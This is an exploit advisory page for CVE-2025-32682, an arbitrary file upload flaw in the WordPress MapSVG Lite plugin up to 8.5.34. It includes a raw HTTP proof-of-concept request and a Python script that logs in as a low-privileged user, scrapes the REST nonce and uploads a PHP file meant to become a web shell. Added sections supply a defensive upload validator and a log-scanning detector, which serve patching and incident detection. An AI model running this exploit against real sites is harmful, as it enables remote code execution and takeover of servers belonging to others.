WordPress MapSVG Lite 8.5.34 Shell Upload

Exploit Details

Basic Information

Exploit Title WordPress MapSVG Lite 8.5.34 Shell Upload
Exploit ID PACKETSTORM:190569
Type packetstorm
Published 2025-04-18T00:00:00
Modified 2025-04-18T00:00:00

CVSS Information

CVSS Score 9.9
Severity CRITICAL
Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE Information

  • CVE-2025-32682

Exploit Description

WordPress MapSVG Lite…

Exploit Code

# 🐚 CVE-2025-32682 – Arbitrary File Upload in MapSVG Lite <= 8.5.34

## 📌 Plugin Details
- **Name:** MapSVG Lite
- **Affected Version:** <= 8.5.34
- **Vulnerability Type:** Arbitrary File Upload
- **CVE ID:** CVE-2025-32682
- **Published Date:** 15 April, 2025
- **CVSS Score:** 9.9 (Critical)

## 💥 Vulnerability Summary
The `MapSVG Lite` plugin for WordPress does not validate file types when uploading SVG files via its REST API endpoint:

```
/wp-json/mapsvg/v1/svgfile
```

This allows an authenticated attacker (Subscriber+) to upload arbitrary PHP files disguised as SVG, resulting in remote code execution (RCE).

## 📎 Proof of Concept (POC) – Raw HTTP Request
```http
POST /wp-json/mapsvg/v1/svgfile HTTP/1.1
Host: 192.168.100.74:888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/admin.php?page=mapsvg-config
X-WP-Nonce: 4febb3ff50
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------155355665422604566641836454807
Content-Length: 298
Origin: http://192.168.100.74:888
Connection: keep-alive
Cookie:

-----------------------------155355665422604566641836454807
Content-Disposition: form-data; name="file"; filename="nxploit.php"
Content-Type: text/xml

-----------------------------155355665422604566641836454807--
```

### 🔍 Vulnerable Code Snippet
The following vulnerable code snippet from the `mapsvg-lite-interactive-vector-maps.php` file highlights the issue:
```php
public function uploadSVG() {
    // Client-supplied name and contents are passed straight to wp_upload_bits():
    // no extension allowlist, no MIME/content check, no capability check.
    $file = $_FILES['file'];
    $upload = wp_upload_bits($file['name'], null, file_get_contents($file['tmp_name']));
    return new \WP_REST_Response(["file" => $upload], 200);
}
```
- ❌ **No filetype check**
- ❌ **No extension validation**
- ❌ **No sanitization of file contents**

This function is directly mapped to the REST endpoint `/wp-json/mapsvg/v1/svgfile`.
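The three missing checks above, expressed as a stand-alone validator. This is an added example, not code from the plugin or the advisory author; the plugin's own fix would apply the same rules in the PHP handler before calling `wp_upload_bits()`. The allowlist, the forbidden-marker list, the `safe_filename` helper and all sample inputs are constructed for this example.

```python
import os
import re
import xml.etree.ElementTree as ET
from typing import Tuple

# Constructed allowlist: the svgfile endpoint should accept nothing but .svg.
ALLOWED_EXTENSIONS = {"svg"}

# Constructed: byte patterns that must never be stored under a web-served uploads
# directory. "<?php"/"<?=" catch PHP payloads; "<script" catches active SVG content.
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")


def safe_filename(filename: str) -> str:
    """Reduce a client-supplied filename to a basename with a conservative charset.

    Strips any directory component (Windows or POSIX separators) so a name such as
    "../../x.svg" cannot steer the file outside the upload directory.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base)
    return base.strip("._") or "upload"


def validate_svg_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason_or_safe_name) for an upload claiming to be an SVG."""
    name = safe_filename(filename)

    # Exactly one extension: this rejects "nxploit.php" as well as "shell.php.svg",
    # which Apache's multi-extension handling can otherwise treat as PHP.
    parts = name.lower().split(".")
    if len(parts) != 2:
        return False, f"filename must have exactly one extension: {name!r}"
    if parts[1] not in ALLOWED_EXTENSIONS:
        return False, f"extension .{parts[1]} not allowed"

    # Content check independent of the extension and of the client's Content-Type.
    lowered = data.lower()
    for marker in FORBIDDEN_MARKERS:
        if marker in lowered:
            return False, f"forbidden content marker {marker!r}"

    # The body must be well-formed XML whose root element is <svg>.
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    local = root.tag.rsplit("}", 1)[-1]  # '{http://www.w3.org/2000/svg}svg' -> 'svg'
    if local != "svg":
        return False, f"root element is <{local}>, not <svg>"

    return True, name


if __name__ == "__main__":
    # Constructed inputs: one legitimate map and the kind of upload the PoC sends.
    samples = [
        ("map.svg", b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>'),
        ("nxploit.php", b""),
        ("shell.php.svg", b"<svg/>"),
        ("map.svg", b"<svg><?php echo 1; ?></svg>"),
    ]
    for fname, body in samples:
        ok, info = validate_svg_upload(fname, body)
        print(f"{fname:14s} -> {'ACCEPT' if ok else 'REJECT'}: {info}")
```

The order of the checks matters: the name and content checks run before the XML parse so that a rejected upload never reaches the parser. In production, parse with `defusedxml` rather than the stdlib module to also rule out entity-expansion attacks, and keep the existing capability check (`upload_files`) on the REST route.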

## 🧠 Exploitation Requirements
- ✅ Requires authentication (Subscriber+)
- 🛑 No filetype or content validation

## 🐍 POC 2 – Python Exploit Script
```python
# By: Nxploited | Khaled Alenazi
import re
import sys
import argparse
import requests

# Certificate verification is disabled for the lab target used in the write-up.
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True)
parser.add_argument("-un", "--username", required=True)
parser.add_argument("-p", "--password", required=True)
args = parser.parse_args()

# Authenticate as a low-privileged (Subscriber+) user via wp-login.php
login_url = f"{args.url}/wp-login.php"
resp = session.post(login_url, data={
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log In'
}, headers={"User-Agent": user_agent})

if 'wordpress_logged_in' not in str(session.cookies):
    print("[-] Login failed")
    sys.exit(1)
print("[+] Logged in successfully.")

# The REST nonce is embedded in the plugin's config page
nonce_page = session.get(f"{args.url}/wp-admin/admin.php?page=mapsvg-config")
match = re.search(r'"nonce":"([a-f0-9]+)"', nonce_page.text)
if not match:
    print("[-] Failed to extract nonce")
    sys.exit(1)
nonce = match.group(1)
print(f"[+] Found nonce: {nonce}")

upload_url = f"{args.url}/wp-json/mapsvg/v1/svgfile"
print(f"[+] Uploading file to: {upload_url}")

# The file body is empty here, as it appears on the page
payload = {'file': ('nxploit.php', '', 'application/x-php')}
headers = {
    'X-WP-Nonce': nonce,
    'Referer': f"{args.url}/wp-admin/admin.php?page=mapsvg-config",
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': user_agent
}

res = session.post(upload_url, files=payload, headers=headers)

try:
    json_res = res.json()
    print("[+] Server response (formatted):")
    print("File Name :", json_res['file']['name'])
    print("URL :", json_res['file']['relativeUrl'])
    print("Path Short :", json_res['file']['pathShort'])
    print("Server Path :", json_res['file']['serverPath'])
    print("\nExploited By : Nxploited | Khaled Alenazi")
except (ValueError, KeyError):
    print("[-] Upload failed or invalid response.")
```

## ☠️ Impact
Exploitation of this vulnerability allows an attacker to upload a `.php` web shell to the `/wp-content/uploads/mapsvg/` directory and execute arbitrary commands on the server.
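A detection pass that a defender can run over web-server access logs for the two observable traces of this issue: a POST to the `svgfile` REST endpoint, and a subsequent request for a `.php` file under `/wp-content/uploads/mapsvg/`. This is an added example, not part of the advisory; it assumes Apache/nginx combined log format, and the log lines, IP addresses and timestamps below are constructed for the example. The endpoint and upload-directory paths are the ones named on the page.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Paths taken from the advisory.
UPLOAD_ENDPOINT = "/wp-json/mapsvg/v1/svgfile"
UPLOAD_DIR = "/wp-content/uploads/mapsvg/"


@dataclass
class Finding:
    ip: str
    ts: str
    kind: str   # "svgfile-upload" or "php-in-uploads"
    path: str


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    """Flag uploads to the vulnerable endpoint and any PHP served from the upload dir."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            findings.append(Finding(m["ip"], m["ts"], "svgfile-upload", path))
        elif path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
            findings.append(Finding(m["ip"], m["ts"], "php-in-uploads", path))
    return findings


def correlate_upload_then_execute(findings: List[Finding]) -> Set[str]:
    """Clients that both uploaded via the endpoint and fetched PHP from the upload dir."""
    uploaded = {f.ip for f in findings if f.kind == "svgfile-upload"}
    fetched = {f.ip for f in findings if f.kind == "php-in-uploads"}
    return uploaded & fetched


# Constructed sample log: one benign SVG fetch plus the upload-then-fetch pattern.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Apr/2025:10:01:02 +0000] "GET /wp-admin/admin.php?page=mapsvg-config HTTP/1.1" 200 5120
203.0.113.5 - - [18/Apr/2025:10:01:09 +0000] "POST /wp-json/mapsvg/v1/svgfile HTTP/1.1" 200 298
203.0.113.5 - - [18/Apr/2025:10:01:15 +0000] "GET /wp-content/uploads/mapsvg/nxploit.php HTTP/1.1" 200 87
198.51.100.7 - - [18/Apr/2025:10:02:00 +0000] "GET /wp-content/uploads/mapsvg/world.svg HTTP/1.1" 200 40211
"""

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f.ts}  {f.ip:14s} {f.kind:16s} {f.path}")
    print("upload-then-fetch from:", correlate_upload_then_execute(found))
```

Any `.php` request under the uploads tree is worth alerting on regardless of this CVE, since WordPress never serves code from there by design; the cleanest mitigation alongside the plugin update is a web-server rule that refuses to execute PHP below `/wp-content/uploads/`.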

## 👤 By:

**Nxploited | Khaled Alenazi**

## ⚠️ Disclaimer
This project is for **educational purposes only**. Unauthorized access to systems without permission is illegal.
